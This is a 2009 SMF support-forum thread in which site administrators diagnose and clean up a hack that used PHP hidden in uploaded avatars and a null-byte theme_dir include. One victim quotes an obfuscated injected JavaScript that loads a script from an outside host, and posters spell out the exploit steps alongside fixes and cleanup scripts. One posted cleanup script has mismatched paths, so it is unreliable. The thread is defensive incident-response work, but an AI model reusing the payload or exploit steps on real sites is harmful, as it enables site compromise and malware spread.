Wouldn't it be safer for everyone if this topic would be in a member only board ? (I guess not ...just asking)

Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?

That's part of the crap I deleted.  It had no impact.  There is a tool I used that someone refer to on here earlier: ATF-Cleaner @ atribune.org.  I kept cleaning my "temp files" out with this before I uploaded anything.  It worked! 

I have 6 sites tied together on one database.  If it hits one, it nails them all.  I am smarter now than 10 days ago about this stuff.

Just for the record my site is getting as tight as a crabs butt...but for now I am counting on you guys as my "DEPENDS" to help me catch my mistakes!

Thanks everyone I believe I am free of the problem now.

Cowdude

Quote from: Polymath on May 10, 2009, 09:33:31 PM
Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?

FCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it.

QuoteFCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it. 

Thats nice.
Do I remove folder called /32 with all that stuff in it? Is it part of this hacker

Wouldn't setting the "Method of registration employed for new members" to "Member Approval" act as a tar pit of sorts? If I understand the setting correctly, the person applying for forum membership cannot do anything until approved by an admin.

If this assumption is correct, then wouldn't this be a solution of sorts for forums who typically see a low volume of membership applications? Ours is low enough to make it feasible to examine the IP and email addresses and cull out anything suspicious, or perhaps send a canned query of sorts to the listed email address.

Thoughts anyone? Even with the IP block bans I have in place, I'm still getting applicants that are very suspicious.

Quote from: Polymath on May 10, 2009, 11:08:39 PM

QuoteFCKeditor is not part of SMF. Some mods (TinyPortal, for example) seem to install it. 

Thats nice.
Do I remove folder called /32 with all that stuff in it? Is it part of this hacker

I'm not sure. But I suggest that you get a backup of that folder (if it's not too large) and then delete it.

However, it's possible that your forum has other problems too... I suggest locking down your site until someone with experience can check it.

oakview, Member Approval seems like a good idea, but perhaps it's not enough.

As a precautionary measure, I suggest disabling all kind of uploads, including avatars. If you choose to let members use external avatars via an URL, make sure that you also disable downloading avatars at that URL (it's in Admin > Attachment and Avatars > Avatars).

I moved my attachments directory out of public_html some time ago, would I still be vulnerable? I've just implemented bans on the IP ranges, email addresses & usernames mentioned. I've also locked down the newbies group so that they can't upload anything until they have 11 posts and installed that Stop Spam mod.

Is there anything else I should be doing?

If anyone uses TinyPortal or any other mod that allows user uploads, disable those too.

QuoteAs a precautionary measure, I suggest disabling all kind of uploads...

@Sarge - done! Good advice.

What about if your are running a gallery  :P

Quote from: DirtRider on May 11, 2009, 03:48:01 AM
What about if your are running a gallery  :P

I think it has vulnerability too. Because when I went to another infected sites, which links I found in my html, after tag <body>. On some sites I saw smf forum but on another gallery.

Quote from: Polymath on May 10, 2009, 09:33:31 PM
Right..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3

Are these part of SMF or this blokes stuff..?? safe to delete?

I had the same situation, that's not a part of smf, that's hackers links on another infected sites. But besides delete this you should find avator with <?php  code, style.css.php (May be another name) and clean every php file from  eval(base64_decode( in top.

Well I think if you have this mod it should stop a lot of them coming into your site to start with http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)

Few days before krisbarteo registered I noticed some weird error logs in cPanel (someone was trying on and on to get to files that didn't exist in my account like /chat, /phpchat, /phpmychat, /roundcubemail and so on) so I banned that whole IP range. He came back the next day using another Ip (close enough to the banned ones) so I banned that too.

Last night I only found the avatar with the bad code in it but it was enough to convince me to uninstall all mods, remove all files and run the large upgrade script.

Is it true that smf 2.0 RC1 is not affected by this vulnerability ? I was waiting for the stable release but I'm starting to think that it is about time to move on.

Please see this topic on how to secure your site.
http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you so much !!! That hacker opened 3 accounts already (krisbarteo, MagicOPromotion and stilusmagic).

The "Stop Spammer" mod is simply fabulous (made me laugh too : it blocked the account of one of my Global Mods, someone I know for years :P - his IP and email address are clean but his nickname is in the database - a common name actually).

I can't thank you enough.  O:)

1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.

Quote from: rthrash on May 11, 2009, 11:17:17 AM
1.1.8 definitely still has some vulnerability regarding themes/avatars: http://www.simplemachines.org/community/index.php?topic=309741.0

Any ideas if this has been fixed in the 2.0 RC, or what the specific bug that allows this to happen is? This really deserves an update pronto.

Off to deploy the Stop Spammer mod.

This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0

Quote from: JBlaze™ on May 11, 2009, 11:19:47 AM
This is an unofficial fix to this hack until an official patch comes out
http://www.simplemachines.org/community/index.php?topic=309717.0

We've disabled all uploads, and the Stop Spammer mod should prevent most signups but there are definitely ways to get around that quickly. So other than shutting down the functionality there's no additional info? Is the same base code in place in the 2.0 branch?

So far, I have not heard of or seen any attacks that affected the 2.0 version, but that's not to say that it hasn't happened.


What it boils down to is that the avatar that is being uploaded in this attack has php code embedded into it and it is being parsed through the avatar handler.

Thanks for your feedback JBlaze™. Much appreciated and prompt. :D

Quote from: rthrash on May 11, 2009, 11:49:38 AM
Thanks for your feedback JBlaze™. Much appreciated and prompt. :D

No problem. I'm trying to stay one step ahead of this attack and provide the best support I can :)

I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.

Quote from: rthrash on May 11, 2009, 02:47:35 PM
I can say that the Stop Spammer add-on is really great indeed. It would have saved us all sorts of grief. Had to manually install it due to how locked down we have things right now but very pleased with what it's doing.

Just to confirm though, the install2.xxx bits are for SMF 2.0, correct? That's not totally clear from any instructions and the manual install instructions aren't parsing on the add-on site for version 1.1.8.

I will have to look into it as I have had it installed for about a month now and didn't have problems on install. There may have been an update since then. I will post back with my findings.

I have just installed it on two of my site with no problems at all

I must say it is very nice. I have deleted a whole folder twice ..In my /FCKeditor/editor/filemanager/browser/default/images/icons the is folder called /32

with something like 2500 files..(no extension) and they are all numbered something like 26ca85f79bc46b4e6ae3a1f00f679fb3


And it won't go away.... Very nice.. >:(

Response:   550 Can't remove directory: Directory not empty
Status:   Retrieving directory listing...
Command:   PASV
Response:   227 Entering Passive Mode (209,200,249,149,107,97)
Command:   LIST
Response:   150 Accepted data connection
Response:   226-ASCII
Response:   226-Options: -a -l
Response:   226 29 matches total
Status:   Directory listing successful

Any ideas? Permissions 755 on it drwxr-xr-x

And another question Can I repair the php file and upload as I go, or will it just get written again?

If this code were placed in my avatar upload/attachments directory htaccess, would it provide protection against an attack like this (I still can't believe anyone could just upload PHP in a '.jpg' file and get it to run?!?) - it was suggested to me after I explained how this person was able to hack my forum (and all other PHP files in every folder):

# secure directory by disabling script execution
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI

Order Allow,Deny
Deny from all
<Files ~ "\.(jpeg|jpg|png|gif)$">
Allow from all
</Files>

I'm thinking it might cause a problem since regular attachments are encrypted, though I would think the encrypted attachments should keep them from being used the same as an uploaded avatar was used? Would this code in an htaccess file keep any of the encrypted files from being uploaded and used on the forum? Would it stop a graphic file from executing code?

If you have PHP code within a .jpg file, I'm not sure that the .htaccess code is going to catch it (since it's not .php). Have you tried making an "innocent" image file (just says "Hello World") and tested it?

Would it be possible to scan incoming image uploads and blank out all script code (everything between <? and ?>, and everything between <script and script>, and whatever else is needed)?

Haven't tried that yet, but it is a good suggestion.

The 2nd suggestion is beyond my skills at this time... but I'm learning out of necessity :) Might work once I learn how, but maybe the simpler suggestion is to do some limits so members have to be around a while before they can upload or do attachments.

Still can't believe it was so easy for this person to hack SMF and use it on the rest of the site. I've read everything suggested or linked on the few threads regarding this hack and protection in general. I hope that covers any other surprises I might get like this one? No more overconfidence for me. Too much I don't know about this stuff.

So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

Oh, and when I was allowing uploading of avatars (I've disabled it for now) the avatars would eventually die off and have to be re-uploaded. 

Quote from: GamingTrend on May 12, 2009, 03:01:24 PM
So I overwrote all but the settings file for SMF Forums 1.8 and I'm still getting code injection.  I'm just not sure where to look at this point...help?

You should remove all files and folders except settings and attachments.
There are number of new files injected as well with "hacker's control panel" code.
Then search and remove all files found by:
grep "<?php" attachments/*

Theoretical question here, because I'm getting all of this straight in my mind ...

If we were to get hit by this hacker, and we had a recent clean backup of all our files, we could just reupload those ... yes?  Or does this code get into the database in some way so we would have to clean that up as well?

So far, this hack only affects the /Sources and /Themes files as well as the affected avatar. To my knowledge, having worked with members on this hack for the past week or so, I have yet to find any damage done to the database.

The one thing that has saved members was backing up their files by simply downloading the enitre SMF installation, minus the database, to their hard drive once a day.

Then, if you feel you have been hacked, take your forum offline, upload the backed up files making sure the old ones are overwritten  and voila!

Great!  Thanks!  (No, we're not going to drop all defenses. ;) )

Quote from: StarWars Fan on May 12, 2009, 04:12:31 PM
I have a question - is this hack simply an avatar upload and the forums wrecked?

I mean, can any Joe Shmoe get a hold of this avatar and use it without "skills"?

That's a good question. But for now, it has been limited to only a few usernames such as "krisbarteo" and "MagicOPromotion" among a few others.

But yes, it is a good point to bring up as so far it is a generic 1x1 avatar that is masked with either a .jpg or .gif extension, but contains php code.

I will look into it.

Hi,

Thanks for this topic !
I have this problem whith the member named above (krisbarteo) and his avatar was indeed encapsulated PHP ...

My error was to set CHMOD 777 on the attachement directory ... Shame on me ...

I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

yes Jblaze, thx. I read it and applied changes.

Quote from: crash56 on May 12, 2009, 03:50:52 PM
Or does this code get into the database in some way so we would have to clean that up as well?

Analyzing DB dump:
The user (krisbarteo) have set theme_dir to ./attachments/avatar_46455.jpg\0 (note zero code at the end)
Then requests (according to error log) to ?action=theme;sa=pick;u=46455;sesc lead to execution of avatar as php in include() call inside theme handling code.

Quote8: Use of undefined constant php - assumed 'php'<br />File: /nfs/www/ru/forum/htdocs/attachments/avatar_46455.jpg<br />Line: 1

How the value of theme_dir appeared in smf_themes table - is the main question.

I have all the code on top..but I can not find his avatar at all.

OK. I removed all code up top and now I only get the top half of my website..  :( my back up was the one i removed it from. Is there something I missed. It is the Sources that has caused this. My admin is still there and working but nothing else.
I just removed and uploaded.
Any ideas?

Make sure that you did not leave a space at the top of each file.

<?php must be the first line

Bugger.. I bet I overwrote settings.php..

Ok so we did some investigating on our forum to see how vulnerable we were to this attack; Agafonov's discovery was a big help in understanding what was going on.

Let me summarize what I think i understand, pieced together from several places and from going through the code.

The attack is a multi-step attack:

FIRST, the user uploads an avatar image (or an attachment on a post), doesn't really matter, and doesn't have to be an image i don't think.
The goal here is for them simply to get their payload php script onto your server.

SECOND, they trick the forum code into INCLUDING their payload php file while it's running other php code.

This second part is the tricky part, and it's what makes some of the potential fixes suggested in this thread useless.

The original method that they use to execute the file payload was described back in november 2008, as can be seen in this thread:
http://www.simplemachines.org/community/index.php?topic=272393.20

The basic idea is that the evil user tells the smf forum to INCLUDE a file from the CUSTOM theme directory (variable theme_dir).  And then they bring up one of the pages on the forum that actually loads a file in the theme dir.

By setting the themedir to the file path of their malicious fake image file (with a \0 on the end of it as seen above), the malicious user actually tricks the smf forum to parse the fake image file and execute the php in it directly).

---

Now, the part that makes this a bit messy to fix is that there are NUMEROUS places in smf where a user's custom 'theme_dir' variable can be set, and numerous places where it is used.

It seems to me that most of these were fixed in earlier SMF releases.. *BUT* a few remain(!) and that is how this exploit is still occuring.

---

[the truth is that users should NEVER be allowed to customize their theme_dir -- this is a flaw in smf and should be remedied]

I'm offering some fixes we did locally, but i'm not guaranteeing this will fix all the risk -- and i hope smf people will follow up.

The first fix will prevent the Theme Picker from using custom user theme_dir variables, which should prevent this particular exploit even in users which previously modified their variable in an effort to hack your forum.  This one is most important quick fix and should solve this particular exploit:

In Themes.php, FIND:
      $request = db_query("
         SELECT ID_THEME, variable, value
         FROM {$db_prefix}themes
         WHERE variable IN ('name', 'theme_url', 'theme_dir', 'images_url')" . (empty($modSettings['theme_default']) && !allowedTo('admin_forum') ? "
            AND ID_THEME IN ('$knownThemes')
            AND ID_THEME != 1" : '') . "
            AND ID_THEME != 0
AND ADD AT THE END
                                AND ID_MEMBER = 0



The second fix will prevent new changes to users theme_dir variable (but not correct existing changes that evil members already set).
I'll leave it for someone else to go into more details since im running low on sleep but basically
In Profile.php, go into makeThemeChanges function
and inside both loops through $_POST['options'] and $_POST['default_options']
and add a line inside the loops saying:
         if (strpos($opt,'_dir')!==FALSE || strpos($opt,'_url')!==FALSE)
            continue;


---

There are 2 more things you can do:
search the smf database, the themes table
for rows where variable=theme_dir

the hits are users who have tried to use this exploit.

DELETE THESE ROWS -- after noting the filenames and userids.

now i'd say don't panic when you find entries there -- but DO go check out the files uploaded by these users (you'll see them listed in these rows), and make sure you don't find really evil php code in any of them..  those tables will also tell you which exact users uploaded the files an attempted to run exploits.  then delete those attachment files.

---

hope that's at least some use -- sorry it's not explained better but we just spent a few hours on this right before we planned on sleeping, so i'm just rushing to explain what we found in time to be useful to someone.

and note that none of the instructions above will do anything to CLEAN a system that has actually been exploited by this attack by someone who put really malicious code in one of the payloads.

DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.

Quote from: Kindred on May 13, 2009, 08:18:08 AM
DO be aware that the development team IS working on fixing this in the code and will release a security update once the fix is tested and confirmed.

We kinda suspected it.

Any indication on ETA would be very much appreciated by a lot of people I guess. Uncertainty is one of the worst things, you know...

I have made contact with this hackers ISP here is the reply

Quote
thanks for you reporting.

1. Please tell more information about this action, domain name (-s) or IP address (-es) of your website, which has suffered?
2. IP address (-es) who attacked your website?

We investigate this action and we'll do anything to avoid this problem in future.

So if you want to PM me your info I will compile a list and send it along to them for investigation. Also include the time more or less that the hack took place 

Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....

I'd just like to add that I also had a Hacktool.Rootkit on the pc I use for administrating my website. I solved this first, and then, when the whole site was taken off-air, I asked my webhoster to change the passwords for the ftp and mysql. After that I uploaded the site again and since then the site hasn't been infested by bad php-code anymore.

Btw, I have the idea that Krisbarteo never got to upload an avatar on my site, yet I got all this trouble anyway...

Quote from: GamingTrend on May 13, 2009, 02:27:06 PM
Should there be files in /Themes/babylon/topic/? 

I'm seeing a BUNCH of files named stuff like 0826864081449d624837cae95c04d304 instead of my hot_poll.gif type files....

I deleted them all just to be sure anyway.  I don't like randomly named files that span roughly 3000 different names.  Let's hope that my cleanup worked.

He has hit our forum as well.

I have been cleaning for 2 days. I thought I got all of the code out of the files, but these problems remain:

Some of our members avatars have failed to display as well as the random letter code that is supposed to be displayed on the registration screen.
The members who's avatars have diasppeared are unable to upload a replacement avatar.
The members who's avatars do not display are in the attachment folder. I have physically verifed that they are there.
I have no error logs indicating an issue.

I have RT clicked 2 of the missing avatars->> properties; and this is what is displayed

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=270;type=avatar

http://sh.com/simplemachinesforum/index.php?action=dlattach;attach=813;type=avatar

I have Rt clicked the random letter code box ->> properties: and this is what is displayed.

http://sh.com/simplemachinesforum/index.php?action=verificationcode;rand=2157f0db0a2cbf8323e7f0fee5ee2fd1

Of course now, new members cannot register without a verification code. I feel somehow they are related

Can you please tell me where to look for the problem

By the way I have a sample of the 64 code, the infected avatar itself , the IP address 94.142.129.147 Latvia

And the code strings of the avatar if anyone wants a copy or any other info.

1.- Here are some details about krisbarteo (http://www.stopforumspam.com/search?q=krisbarteo). Can somebody give me more data to report in SFS site? (and all the people using this DB will be immune from these users).

2.- If somebody have to "the avatar uploaded" by this user, should give to the Team SMF (and me, XD, I have curiosity). (done (http://www.simplemachines.org/community/index.php?topic=307717.msg2046772#msg2046772), thanks :))

3.- There is another problem, how the spammers run this file once uploaded?

Since I have an avatar upload on registration modification which I do not feel like messing with I have disabled registrations. What if I just say screw it and take my chances, while saving a copy of all the files in me forum directory twice a day. If I get hacked can't I just upload all the clean files from my forum and all will be fine?

Quote from: M-DVD on May 13, 2009, 11:23:37 PM
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480

Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Again, I'd like to add that my forum was hacked several times in a short time span (a few days), even though I completely deleted the forum and replaced it by a clean backup. Somehow, either through the php-script or via the rootkit.hacktool on my admin-pc, the ftp server password was compromised, and the site was hacked again overnight.

So, if your site is hacked, make sure your admin-pc is virus and malware free. Then delete your whole forum (make a backup of the infected forum if you wish, I did so I could put non-infected avatars and attachments, as well as other changes, back on-line), change the ftp and mysql server passwords, and upload clean forum software.

And, the most important lesson I've learnt is: MAKE BACK-UPS! This will be the last time I have to resort to a backup made almost one and a half year ago. I suggest making back-ups every time you change some of the php or html files, before upgrades/updates, and generally often enough to ensure attachments and avatars won't be lost.

Quote from: Agafonov on May 14, 2009, 02:29:55 AM
<<< But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

You're not saying that the mere presence of this value is bad right? Meaning there is a legitimate one that's supposed to be there correct?

I got hacked with a javascript between the head and body of my site. I tried re-installing, but nothing seems to work. Code is still there...anyone know if this is the same hack?

</head><script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
--></script>
<body>

Quote from: Agafonov on May 14, 2009, 02:29:55 AM

Quote from: Filipina on May 14, 2009, 12:05:54 AM
If I get hacked can't I just upload all the clean files from my forum and all will be fine?

According to my findings, simple overwriting files will not help.
You have to remove all files and folders except Settings.php and attachments/ (if no other used by your mods, I'm not sure).
This will make you sure that where is no hacker's code in your files.
But even then you have to alter database to clean spectial "theme_dir" value from "smf_themes" table that was used to break into.

Ok thanks for the information. I did a search today of the main two user names being used in the attacks and the results are unbelievable. When you see the search results and site descriptions showing things like "poker" and "gaming" it must be too late for them. My registration will just remain closed until a patch comes out because I am not taking any chances. It is not only the infection itself, but I am sure Google will just blacklist your site once they crawl and find that mess. It is truly sad.

Actually, the statement is slightly incorrect.

uploading a clean set of files *WILL* help and will solve your immediate problems with the forum.  It will not, however, close any backdoors or other exploits that the hacker may have added. THOSE other files are the ones you need to delete.

Quote from: JBlaze™ on May 12, 2009, 04:29:52 PM
I have also created a topic on how to prevent being hacked.

http://www.simplemachines.org/community/index.php?topic=309717.0

Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

Quote from: nehcregit on May 15, 2009, 02:30:10 AM
Thank you very much. Is SimpleMachines actually working on a fix for this security problem? Don't want any details, just a simple "yes, should be online soon" or a "no, this cannot be solved on a SMF basis".  ;)

They're working on it.  Kindred posted that they're working on a fix.  It's on page 8 of this thread. 

No ETA yet. 

Ah, thanks.  :)

Krisbarteo registered on my forum today,


krisbarteo - [email protected] - 94.142.129.147 -  Today at 12:58:32


The "Stop Spammer" -mod marked all profile details as spammer, and stopped krisbarteo from completing the registration. So I can say that mod is a good choice for protecting your forums as well ;)

http://custom.simplemachines.org/mods/index.php?mod=1547

Some additional info:
The hostname of krisbarteo seems to be the same as IP,
and I have a gender option on registration, and krisbarteo selected male ;D

One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp (http://www.motobit.com/util/base64-decoder-encoder.asp).

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

We got hit slightly differently it seems. The attacker managed to upload a file "attach.php" in the attachments directory together with the avatar exploit. He then created a htaccess file with a redirect to a file he either created or modified called readme_old. Somehow this combination created an iframe using our home page code but into which was called many different versions of drug selling stores. All of these urls were accessed from the attachments directory in the forum via the redirect in the htaccess file.

I'm still trying to work out what sequence of events lead to the compromise - but it was almost certainly via the avatar or attachment upload. What worries me is that we had "encrypt file extensions" enabled so not sure how he invoked the file remotely. For sure I'd like to catch up with him!

I only found one file (readme_old) with the base64 code so far.

Pretty crap situation, particularly as Google crawled the vast array of urls and indexed them - we knew something was wrong when our bandwidth went sky high.

I also find "KrisBarteo" in Member Base but it's look like that he doesn't success to hack us... At least I don't have anything unusual with my SCForum.

Can somebody please also check (and verify) is everything OK with Forum??


http://www.SCforum.info (http://www.scforum.info)


Thanks in Advance!

S.

Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.

Quote from: Sarge on May 15, 2009, 04:18:02 PM

Quote from: Samker on May 15, 2009, 04:13:26 PM
Can somebody please also check (and verify) is everything OK with Forum??

Your forum looks fine to me.

I Agree... ;)

Thank you guys...  :D

I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

I have tight settings (normal for Security Forum which I run) maybe I could help other with protections... I mean we could compare settings and find differences between installed mods, enabled features etc. ??

Best Regards,

S.

Quote from: Samker on May 15, 2009, 04:13:26 PMCan somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

Quote from: agridoc on May 15, 2009, 05:06:14 PM

Quote from: Samker on May 15, 2009, 04:13:26 PMCan somebody please also check (and verify) is everything OK with Forum??

It might look OK but be infected. Go with FTP and check some PHP files. If there is no added code, it's rather not infected. Also check your error log.

I was already make a double check of all mentioned things and everything seem Ok.

Thanks for reply.

Quote from: Agafonov on May 14, 2009, 02:16:53 AM

Quote from: M-DVD on May 13, 2009, 11:23:37 PM
3.- There is another problem, how the spammers run this file once uploaded?

Read http://www.simplemachines.org/community/index.php?topic=307717.msg2056804#msg2056804 and http://www.simplemachines.org/community/index.php?topic=307717.msg2057480#msg2057480

THANKS Agafonov, without your info, I never could find the trick  >:(

Quote from: Agafonov on May 12, 2009, 06:02:29 PM
How the value of theme_dir appeared in smf_themes table - is the main question.

The guy is brillant. I found the way, just because already knew that exists and search in the site.

Quote from: Samker on May 15, 2009, 04:32:36 PM
I'm now wondering why he doesn't success with hack since it's registered from 09. May 2009. and I know about this "hole" only for few hours??

Perhaps because the guy has been busy :P

Quote from: M-DVD on May 15, 2009, 05:53:32 PM
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)

Quote from: Tiribulus on May 15, 2009, 05:59:07 PM

Quote from: M-DVD on May 15, 2009, 05:53:32 PM
<<< I found the way, just because already knew that exists and search in the site. >>>

How would ya like to a be a sterling citizen and share that with us? :)

No problem XD

I have found how to make the hack. Now I'm trying replicate in SMF 2 and in other potential sites. Then I will make the fix, and say the fix.

Once again, be aware that the SMF development team is working very hard on putting together an official security patch.

Someone had a snoop at one of my sites a few weeks back, but since that site is invite only, no glory.
I don't allow attachments/images uploaded, but I'm about to open a music site where upcoming/unknown artists may attach their mp3 files for users to listen to.
So I look forward to your patch team :)

Quote from: agridoc on May 15, 2009, 06:54:34 AM
One important thing that I had not seen discussed is to find and delete the PHP file that is loaded by the injected script. It can be found if the base64 code is decoded http://www.motobit.com/util/base64-decoder-encoder.asp.

The longest path in the domain's dir is used and many garbage files are added there. I had to use SHELL to find and keep this file for examination, as there are file limitations in FTP and CP filemanager. The file can be decoded to see what else could have been done.

If there is no recent backup each file PHP has to be opened and the injected code be deleted.

I am looking for a cleaning script that would

- First ask for input of the string to search (the injected code).
- Search recursively the domain for the incidence of PHP files and build an array.
- Use this array to open and search each PHP file and, if found, delete the string (the injected code).

Such a cleaning script would be greatly appreciated, even by supporters.

dunno if you found a script by now, i have done just that with a simple find/sed on shell routine recently.


nohup find /tmp/web13 -name "*.php" -exec grep "aWYoZnVuY3Rpb25" {} \; -print -exec clear.sh {} \; | grep tmp &


clear.sh:


#!/bin/bash

mkdir -p /tmp/backup`dirname $1`

sed -e '1d' $1 > /tmp/backup$1

mv $1 $1.hack 2>/dev/null

mv /tmp/clemensbackup$1 $1 2>/dev/null


you could even do it with "sed -i" command in one line, i had to copy/move all the files cause i did on a curlftpfs mounted device.

KrisBarteo tried to register at our forum this morning.  We had the IP banned, so he didn't get in. 

Many thanks to everyone here for all the excellent information, and HUGE thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have know about this threat if it weren't for that e-mail. 

*phew*  Disaster averted. 

<Heads back to the forum to continue shoring up defenses>

Quote from: StarWars Fan on May 16, 2009, 08:53:13 AM
SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

Yes, don't know how long exactly this issue is known but I discovered it just yesterday because my avatar disappeared... And the user krisbarteo allready registered some weeks ago!
I visit my admin page allmost every day so some warning could have prevented the being hacked on the way it happened now.

Quote from: Relyana on May 10, 2009, 09:14:33 PM

Quote from: WillyP on May 10, 2009, 04:49:04 PM

My forum showed no signs of the affliction... a wiki installation on the same domain errored out, thats how I knew there was a problem.

What do you mean by that ? He registered on my forum too with both of his nicknames. He only activated one of his accounts and uploaded the fake avatar containing that php code but I can't find anything wrong or weird in any other files (it's 4 a.m. here and I'm still searching). He was active for only 1 minute and 9 seconds.

Wouldn't it be safer for everyone if this topic would be in a member only board ? (I guess not ...just asking)

Meaning, the forum functioned fine, although I did not test every single item, it appeared to be working normally. This particular website also has an installation of WikkaWiki, which did not work. When I went to the wiki, instead of the wiki page, there was an error message. He did not register on the wiki, only on the SMF forum. However EVERY php file i looked at on the domain was infected with the "Eval (etc...)" code. EXCEPT the config files, which was set read only. I also had a few files infected that were unrelated to either the forum or the wiki. Uploading the avatar is only the first step in his evil plot ;), the code must then be activated. So step two is infecting the php files, which seemed to be done days later. Someone reported a large number of files uploaded to the server, apparently step three. I did not get these, I discovered the infection about nine hours after it occurred. Who knows what step four would be? World domination? ;)

Quote from: WillyP on May 16, 2009, 09:51:37 AM
Who knows what step four would be?

Spam. Apparently that's the whole purpose.

Quote from: Kindred on May 15, 2009, 07:14:14 PM
Once again, be aware that the SMF development team is working very hard on putting together an official security patch.

I'm surprised that this hasn't been broadcast through the admin panel "Live from Simple Machines..." feed yet. Most site owners probably don't check back to the Main SMF site daily and every day that goes by is another chance for more exploits and unhappy forum owners. Not talking about the danger is borderline irresponsible at best. Your forum owners should have been warned IMO the day it was reported and verified, along with a temporary work around (disabling avatars/attachments).

It's a very destructive exploit: every PHP file is compromised even outside of SMF, and in our case every file with "log" in it anywhere was deleted including those named login, logout, blog, logo, etc. Didn't matter the filetype (images, css, php and html files were affected—they were trying to hide their tracks). On less secured systems, it would be possible to install a rootkit and require wiping a server completely including OS reinstall to be sure things are safe again.

Quote from: StarWars Fan on May 16, 2009, 08:53:13 AM

Quote from: crash56 on May 16, 2009, 08:37:39 AM
thanks to our webhost (GC Solutions) for sending around an e-mail warning all the SMF users about this hacker.  We would not have know about this threat if it weren't for that e-mail. 

SimpleMachines should have warned everybody through our SMF Admin panel - I'm sure it would have prevented many of the hackings.

I agree that would be great help...

Don't know is that possible before releasing new patched version??

I spent about 5 hours last night trying to contact SMF websites that showed the hacker user names on search. If they had any activity at all I signed up just to let them know. I seems unbelievable to me that after this much time has gone by there is no real official warning, patch, news flash, anything official from SMF.

Of course there are threads here with people discussing it, but unless you get the warning out to SMF's users most of them are flying blind. More and more sites are being severely compromised or even destroyed every day. If SMF can send me a news flash in my package manager everytime a new MOD comes available, then I don't understand why at least a warning cannot go out?

Okay, I am desperately looking for a sample of the URL used to execute this attack, and what, if anything is abnormal to SMF about it.

